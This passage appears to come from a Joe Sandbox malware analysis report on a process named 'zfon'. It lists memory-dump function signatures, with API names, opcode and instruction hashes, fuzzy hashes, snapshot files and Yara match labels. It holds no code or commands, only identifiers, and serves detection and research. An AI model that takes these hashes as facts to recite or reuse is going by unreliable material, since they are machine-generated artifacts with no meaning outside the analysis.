                                                                                                • Opcode Fuzzy Hash: fc8a794ece072c0eb655f61c286cb035e8ef0a971ebfcc12b5a3971e85337c2d
                                                                                                • Instruction Fuzzy Hash: 9A41F270528E4D8FE746EF28C598BA6B3E1FBAA300F50475AF449C7162EB7598C4C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                                                                                • String ID:
                                                                                                • API String ID: 1346393832-0
                                                                                                • Opcode ID: 14a0a2280ba3913498afd46af4e05953e53841631f47ab32aa26e21ecbd1485a
                                                                                                • Instruction ID: 88dcfe2265728c17f7055d11a169f523fcc5e71709a706977a8210f0fb413856
                                                                                                • Opcode Fuzzy Hash: 14a0a2280ba3913498afd46af4e05953e53841631f47ab32aa26e21ecbd1485a
                                                                                                • Instruction Fuzzy Hash: 7171DA30618E8D4FE745EB3CC458BAAB3D2FBD9314F64571AE499C22D6DA7488C4C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_task$Lockitstd::_$Lockit::_Lockit::~_
                                                                                                • String ID:
                                                                                                • API String ID: 2973761340-0
                                                                                                • Opcode ID: bf22bb379a8e7632d8d336ecfe290394dbc84d542f62b966fb0ca8af05395837
                                                                                                • Instruction ID: 4a8ddaf804d0a8e1c9fe070590fa5e90014823a53f87434a7a9c031c2e67296d
                                                                                                • Opcode Fuzzy Hash: bf22bb379a8e7632d8d336ecfe290394dbc84d542f62b966fb0ca8af05395837
                                                                                                • Instruction Fuzzy Hash: D171C074918B0A8AEF15EFA8C4257EEB7A6FF89710F20015BE405D7292DA30DC05C7C2
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Maklocwcsstd::_$Yarn
                                                                                                • String ID:
                                                                                                • API String ID: 1194159078-0
                                                                                                • Opcode ID: f8faeaa6822d61a2497c1671f2cc7a916da0a99ff22676ad33aa91cfa711cf9a
                                                                                                • Instruction ID: 2d12bbd6e49d37998b362bb3444e080aa6dd76e4a1fa80ef4589ada94a9891d0
                                                                                                • Opcode Fuzzy Hash: f8faeaa6822d61a2497c1671f2cc7a916da0a99ff22676ad33aa91cfa711cf9a
                                                                                                • Instruction Fuzzy Hash: FE313C34514F098FEB54EF388499BA673E2FBA9341F50466AD44AC7162EE70DD84CB42
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: &$/
                                                                                                • API String ID: 1109970293-2578988991
                                                                                                • Opcode ID: be6b46890b10a345fbdaeb7d30acd3836647471af38061ebdf142676a04330be
                                                                                                • Instruction ID: c442f501b5d01d20a70ff051d51bd4b7b18e422f886dfdbe56102d2ad0e82119
                                                                                                • Opcode Fuzzy Hash: be6b46890b10a345fbdaeb7d30acd3836647471af38061ebdf142676a04330be
                                                                                                • Instruction Fuzzy Hash: AC31A070528E8D8FE745EF28C49876AB7E1FBA9304F50465EF449C3262DB7994C0C702
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copy__std_exception_destroy
                                                                                                • String ID:
                                                                                                • API String ID: 2960854011-0
                                                                                                • Opcode ID: bd92f64d335261570e5d26f6f9255d8f4051e18708e87215bc64ab645aac3861
                                                                                                • Instruction ID: 6b3618a1fcd84f6c3a76c264d7c9816f638f5a4b5c86d3ef96cc73b8855a2fec
                                                                                                • Opcode Fuzzy Hash: bd92f64d335261570e5d26f6f9255d8f4051e18708e87215bc64ab645aac3861
                                                                                                • Instruction Fuzzy Hash: 2AF12F70A08E0D8FDB95EF58D498AAAB7F5FB69301F10426FE409D7261DB34E944CB81
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copy__std_exception_destroy
                                                                                                • String ID:
                                                                                                • API String ID: 2960854011-0
                                                                                                • Opcode ID: 015c01bb61b80a617eceb6ba28b9947b62ec006bb18cc4e43cbde721b9457c70
                                                                                                • Instruction ID: 54fa1b01c3aedb1f6ef467ba3f499d8062878ece1b18c4b1c502b53c084c51eb
                                                                                                • Opcode Fuzzy Hash: 015c01bb61b80a617eceb6ba28b9947b62ec006bb18cc4e43cbde721b9457c70
                                                                                                • Instruction Fuzzy Hash: 6AF13C70A08E0D9FEB95EF58D498A99B7F1FBA9301F10426FE409D7261DB30E944CB81
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Setgloballocalestd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 801953252-0
                                                                                                • Opcode ID: e093b0e60459fbe3058fb1df9b8c31c26e43fe3416cd89e84d5938561010208e
                                                                                                • Instruction ID: 2013a50e2e60e51beaf308a8fe4d45e29cddc9855e33ae53101edbdbc7a3916c
                                                                                                • Opcode Fuzzy Hash: e093b0e60459fbe3058fb1df9b8c31c26e43fe3416cd89e84d5938561010208e
                                                                                                • Instruction Fuzzy Hash: 85B19370A18A4E8FEB54EF68D8647EA77E2FF99310F10025AE409D3252DA34D950CB82
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                • String ID:
                                                                                                • API String ID: 593203224-0
                                                                                                • Opcode ID: af466333a9729f9682caa3f8c0ad6bbb8cf15438e78ccc876ba822118fb2a79a
                                                                                                • Instruction ID: 0ba26c4a6a6368432a56719ba8e8b6b21e1eb6aa27d354741a3b23fb34fa6993
                                                                                                • Opcode Fuzzy Hash: af466333a9729f9682caa3f8c0ad6bbb8cf15438e78ccc876ba822118fb2a79a
                                                                                                • Instruction Fuzzy Hash: 8B519135114E0ECFEB54EF18D499BA7B3E2FBA4304F60059AE459C71A2DA34ED45CB82
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                • String ID:
                                                                                                • API String ID: 593203224-0
                                                                                                • Opcode ID: a0ed68bf35fb4c8fd617e305e19bb09cf24f121f403a291cc7245bfd46121afe
                                                                                                • Instruction ID: 9ba9fe321a5790908b68f2a88b2207abb43896e8679c965e4fe33c35ed60d451
                                                                                                • Opcode Fuzzy Hash: a0ed68bf35fb4c8fd617e305e19bb09cf24f121f403a291cc7245bfd46121afe
                                                                                                • Instruction Fuzzy Hash: 6A31AF35118A0A8FEB94EF58D5A97A773E2FBA8354F21055EE059C3162DA31ED01C783
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: cef_string_utf16_clear
                                                                                                • String ID:
                                                                                                • API String ID: 2864223729-0
                                                                                                • Opcode ID: ce5ae4ba9fe376b65645fd51b03e60113563d6b76bda0864989d9fc94911f9d3
                                                                                                • Instruction ID: 872d016b7a786da3a8c215d7fe57ed603b561b343a901bb8c9585f43565002b0
                                                                                                • Opcode Fuzzy Hash: ce5ae4ba9fe376b65645fd51b03e60113563d6b76bda0864989d9fc94911f9d3
                                                                                                • Instruction Fuzzy Hash: 62316E72618A85C2EB64EF15E8543A9E370FB88BD4F885031DA9E476A8DF3CD584C760
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: cef_string_utf16_set
                                                                                                • String ID:
                                                                                                • API String ID: 2786225788-0
                                                                                                • Opcode ID: 7197ee378ef0cece509e4b77bb64e0ce9f980a1e7a92a43fd744432bfccf45b7
                                                                                                • Instruction ID: 1ab09760f38317db0c63861273379e1616e34a1cef2e68ce99dc241f308c5ea1
                                                                                                • Opcode Fuzzy Hash: 7197ee378ef0cece509e4b77bb64e0ce9f980a1e7a92a43fd744432bfccf45b7
                                                                                                • Instruction Fuzzy Hash: 64210666A04B8093E758CF3AE6406A9B370F799B94F00A125DF9E53A16DF38F1E4C700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: cef_string_utf16_clear
                                                                                                • String ID:
                                                                                                • API String ID: 2864223729-0
                                                                                                • Opcode ID: d33a2170fbd08e1295aa745bb59190dabb63d073c9f8e86e5b0d8221db3b0f23
                                                                                                • Instruction ID: 0369f5a37d547324310c4fe1226cbfeee328ad537b4005ad5925154f25ebfc57
                                                                                                • Opcode Fuzzy Hash: d33a2170fbd08e1295aa745bb59190dabb63d073c9f8e86e5b0d8221db3b0f23
                                                                                                • Instruction Fuzzy Hash: B2F08122E1864142E780BF11ED413AD6330EB487C0FC44431E65D07AEADF3CE4928360
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 73155330-3916222277
                                                                                                • Opcode ID: 70bc9bd995cb069c2d3e0a6c96377ccbba1a305319187803a7386bcba82571ea
                                                                                                • Instruction ID: db2ed2c96bd1800d4348eb07a1793a1f13304fe1f4a1dbf8a0b007d4247f1d72
                                                                                                • Opcode Fuzzy Hash: 70bc9bd995cb069c2d3e0a6c96377ccbba1a305319187803a7386bcba82571ea
                                                                                                • Instruction Fuzzy Hash: 40719334218E1E8FDB59EF6CC098B65B7D2FB99320F60065AD41AC7691DB31EC45C782
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                • String ID: ?
                                                                                                • API String ID: 1286766494-1684325040
                                                                                                • Opcode ID: f7d8d8c17d4534d6d9581430c191c8685afda81465dcb08cdff0caec24115f1b
                                                                                                • Instruction ID: c26fd7271982db83651dbced70d27a6fff5945ef9a6dfbdba441d7dd7fed5fb2
                                                                                                • Opcode Fuzzy Hash: f7d8d8c17d4534d6d9581430c191c8685afda81465dcb08cdff0caec24115f1b
                                                                                                • Instruction Fuzzy Hash: 7E51D63422CB4A4FE768EB68946A37B7BD2EBC5325F20066FE495C21D1DA24DC41C683